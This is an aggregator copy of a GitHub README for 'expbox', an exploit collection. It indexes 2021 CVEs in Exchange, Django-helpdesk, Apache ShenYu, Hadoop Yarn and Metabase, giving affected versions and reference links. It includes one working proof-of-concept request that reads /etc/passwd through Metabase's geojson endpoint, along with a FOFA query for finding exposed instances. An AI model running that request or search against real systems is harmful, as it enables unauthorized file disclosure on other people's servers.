8

GitHub - 0x0021h/expbox: Vulnerability Exploitation Code Collection Repository

 2 years ago
source link: https://github.com/0x0021h/expbox
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Introduction

expbox is an exploit code collection repository

CVE-2021-41349 Exchange XSS PoC

<= Exchange 2013 update 23
<= Exchange 2016 update 22
<= Exchange 2019 update 11

CVE-2021–3945 Django-helpdesk stored XSS PoC

<= 0.3.0

CVE-2021-37580 Apache ShenYu 2.3.0/2.4.0 authentication bypass

Ref: https://github.com/fengwenhua/CVE-2021-37580

Hadoop Yarn RPC RCE

Ref: https://github.com/cckuailong/YarnRpcRCE

CVE-2021-41277 MetaBase Arbitrary File Read

MetaBase < 0.40.5
1.0.0 <= MetaBase < 1.40.5

FOFA:

app="Metabase"

PoC:

GET /api/geojson?url=file:/etc/passwd HTTP/1.1

CVE-2021-42321 Exchange Pre-Auth RCE

<= Exchange 2016 update 22
<= Exchange 2019 update 11

Windows 0day 

Ref:https://github.com/klinix5/InstallerFileTakeOver

All content comes from the Internet, if there is a copyright problem, please contact me to delete.


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK